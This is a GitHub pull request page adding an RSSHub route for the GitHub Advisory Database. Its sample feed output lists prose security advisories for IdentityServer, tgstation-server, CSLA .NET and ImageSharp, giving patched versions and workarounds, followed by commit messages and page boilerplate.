<p>This vulnerability is fixed in the following versions of Duende.IdentityServer:</p>
<ul>
<li>7.0.6</li>
<li>6.3.10</li>
<li>6.2.5</li>
<li>6.1.8</li>
<li>6.0.5</li>
</ul>
<p>Duende.IdentityServer 5.1 and earlier and all versions of IdentityServer4 are no longer supported and will not be receiving updates.</p>
<h3>Workarounds</h3>
<p>If upgrading is not possible, use <code class="notranslate">IUrlHelper.IsLocalUrl</code> from ASP.NET Core 5.0 or later to validate return Urls in user interface code in the IdentityServer host.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-ff4q-64jc-gx98" href="https://github.com/DuendeSoftware/IdentityServer/security/advisories/GHSA-ff4q-64jc-gx98">GHSA-ff4q-64jc-gx98</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/269ca2171fe1e901c87f2f0797bbc7c230db87c6/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/269ca2171fe1e901c87f2f0797bbc7c230db87c6">DuendeSoftware/IdentityServer@<tt>269ca21</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/765116a2d4fb0671b6eba015e698533900c61c8e/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/765116a2d4fb0671b6eba015e698533900c61c8e">DuendeSoftware/IdentityServer@<tt>765116a</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/d0d8eab35ad9183b14925496803ed8b36658d0a1/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/d0d8eab35ad9183b14925496803ed8b36658d0a1">DuendeSoftware/IdentityServer@<tt>d0d8eab</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/f04cf0be859b93f43563f8f812eb92206ad94011/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/f04cf0be859b93f43563f8f812eb92206ad94011">DuendeSoftware/IdentityServer@<tt>f04cf0b</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/DuendeSoftware/IdentityServer/commit/fe817b499933d6ed6141b153492d7335c28b184a/hovercard" href="https://github.com/DuendeSoftware/IdentityServer/commit/fe817b499933d6ed6141b153492d7335c28b184a">DuendeSoftware/IdentityServer@<tt>fe817b4</tt></a></li>
<li><a title="GHSA-55p7-v223-x366" href="https://github.com/IdentityServer/IdentityServer4/security/advisories/GHSA-55p7-v223-x366">GHSA-55p7-v223-x366</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39694" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-39694</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ff4q-64jc-gx98</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ff4q-64jc-gx98</guid>
<pubDate>Wed, 31 Jul 2024 15:28:54 GMT</pubDate>
</item>
<item>
<title>tgstation-server's DreamMaker environment files outside the deployment directory can be compiled and ran by insufficiently permissioned users</title>
<description><h3>Impact</h3>
<p><em>What kind of vulnerability is it? Who is impacted?</em></p>
<p>Low permission users using the "Set .dme Path" privilege could potentially set malicious .dme files existing on the host machine to be compiled and executed.</p>
<p>These .dme files could be uploaded via tgstation-server (requiring a separate, isolated privilege) or some other means.</p>
<p>A server configured to execute in BYOND's trusted security level (requiring a third separate, isolated privilege OR being set by another user) could lead to this escalating into remote code execution via BYOND's shell() proc.</p>
<p>The ability to execute this kind of attack is a known side effect of having privileged TGS users, but normally requires multiple privileges with known weaknesses. This vector is not intentional as it does not require control over the where deployment code is sourced from and <em>may</em> not require remote write access to an instance's <code class="notranslate">Configuration</code> directory.</p>
<h3>Patches</h3>
<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>
<p>This problem is patched by pull request #1835 and fixed in versions 6.8.0 and above.</p>
<h3>Workarounds</h3>
<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>
<p>Do not give un-trusted users the Deployment permission to set a .dme path on instances.</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-c3h4-9gc2-f7h4" href="https://github.com/tgstation/tgstation-server/security/advisories/GHSA-c3h4-9gc2-f7h4">GHSA-c3h4-9gc2-f7h4</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-41799" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-41799</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2428714940" data-permission-text="Title is private" data-url="https://github.com/tgstation/tgstation-server/issues/1835" data-hovercard-type="pull_request" data-hovercard-url="/tgstation/tgstation-server/pull/1835/hovercard" href="https://github.com/tgstation/tgstation-server/pull/1835">tgstation/tgstation-server#1835</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/tgstation/tgstation-server/commit/374852fe5ae306415eb5aafb2d16b06897d7afe4/hovercard" href="https://github.com/tgstation/tgstation-server/commit/374852fe5ae306415eb5aafb2d16b06897d7afe4">tgstation/tgstation-server@<tt>374852f</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c3h4-9gc2-f7h4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c3h4-9gc2-f7h4</guid>
<pubDate>Mon, 29 Jul 2024 16:44:15 GMT</pubDate>
</item>
<item>
<title>CLSA Directory Traversal vulnerability</title>
<description><p>Directory Traversal vulnerability in Marimer LLC CSLA .Net before 8.0 allows a remote attacker to execute arbitrary code via a crafted script to the MobileFormatter component.</p>
<p>Fixes for this issue have been backported to the 5.x, 6.x, and 7.x branches of CSLA. CSLA version 5.5.4 contains a fix. As of time of publication, 6.x and 7.x do not have numbered versions containing the fix but do have fix commits available.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-28698" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-28698</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1988343400" data-permission-text="Title is private" data-url="https://github.com/MarimerLLC/csla/issues/3552" data-hovercard-type="pull_request" data-hovercard-url="/MarimerLLC/csla/pull/3552/hovercard" href="https://github.com/MarimerLLC/csla/pull/3552">MarimerLLC/csla#3552</a></li>
<li><a href="https://www.intruder.io/research/path-traversal-and-code-execution-in-csla-net-cve-2024-28698" rel="nofollow">https://www.intruder.io/research/path-traversal-and-code-execution-in-csla-net-cve-2024-28698</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/2c32a5748a0a4bb0159285dfad61d4050e890080/hovercard" href="https://github.com/MarimerLLC/csla/commit/2c32a5748a0a4bb0159285dfad61d4050e890080">MarimerLLC/csla@<tt>2c32a57</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/445bc609bc117f62cabf49e1462f7a43b0f8f9a2/hovercard" href="https://github.com/MarimerLLC/csla/commit/445bc609bc117f62cabf49e1462f7a43b0f8f9a2">MarimerLLC/csla@<tt>445bc60</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/8fbdd8c773bfeb9ba3e52d91b5a664848629b13a/hovercard" href="https://github.com/MarimerLLC/csla/commit/8fbdd8c773bfeb9ba3e52d91b5a664848629b13a">MarimerLLC/csla@<tt>8fbdd8c</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/MarimerLLC/csla/commit/f3a5c3474974f60ce3c8ffbd5d91c23a1e397ea4/hovercard" href="https://github.com/MarimerLLC/csla/commit/f3a5c3474974f60ce3c8ffbd5d91c23a1e397ea4">MarimerLLC/csla@<tt>f3a5c34</tt></a></li>
<li><a href="https://github.com/MarimerLLC/csla/releases/tag/v5.5.4">https://github.com/MarimerLLC/csla/releases/tag/v5.5.4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9xhh-3m78-gvgj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9xhh-3m78-gvgj</guid>
<pubDate>Mon, 22 Jul 2024 18:31:48 GMT</pubDate>
</item>
<item>
<title>SixLabors ImageSharp has Excessive Memory Allocation in Gif Decoder</title>
<description><h3>Impact</h3>
<p><em>What kind of vulnerability is it? Who is impacted?</em></p>
<p>A vulnerability discovered in the ImageSharp library, where the processing of specially crafted files can lead to excessive memory usage in the Gif decoder. The vulnerability is triggered when ImageSharp attempts to process image files that are designed to exploit this flaw.</p>
<h3>Patches</h3>
<p><em>Has the problem been patched? What versions should users upgrade to?</em></p>
<p>The problem has been patched. All users are advised to upgrade to v3.1.5 or v2.1.9.</p>
<h3>Workarounds</h3>
<p><em>Is there a way for users to fix or remediate the vulnerability without upgrading?</em></p>
<p>Before calling <code class="notranslate">Image.Decode(Async)</code>, use <code class="notranslate">Image.Identify</code> to determine the image dimensions in order to enforce a limit.</p>
<h3>References</h3>
<p><em>Are there any links users can visit to find out more?</em></p>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2377236095" data-permission-text="Title is private" data-url="https://github.com/SixLabors/ImageSharp/issues/2759" data-hovercard-type="pull_request" data-hovercard-url="/SixLabors/ImageSharp/pull/2759/hovercard" href="https://github.com/SixLabors/ImageSharp/pull/2759">Six... |
artefaritaKuniklo
pushed a commit
to artefaritaKuniklo/RSSHub
that referenced
this pull request
Dec 13, 2024
* feat(github-advisor): add GitHub Advisory Database RSS route and namespace * fix(xiaohongshu): handle optional chaining for cover image URL * refactor(github-advisor): remove unused code and files * feat(github): 添加 GitHub Advisory Database RSS 路由 * refactor(route): fix category in GitHub Advisor route * refactor(route): 更新 GitHub Advisor 路由中的类别参数名 * refactor(route): Updated to scrape HTML directly instead of relying on third-party API
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Involved Issue / 该 PR 相关 Issue
无
Example for the Proposed Route(s) / 路由地址示例
New RSS Route Checklist / 新 RSS 路由检查表
PuppeteerNote / 说明
为github.com/advisories添加rsshub的订阅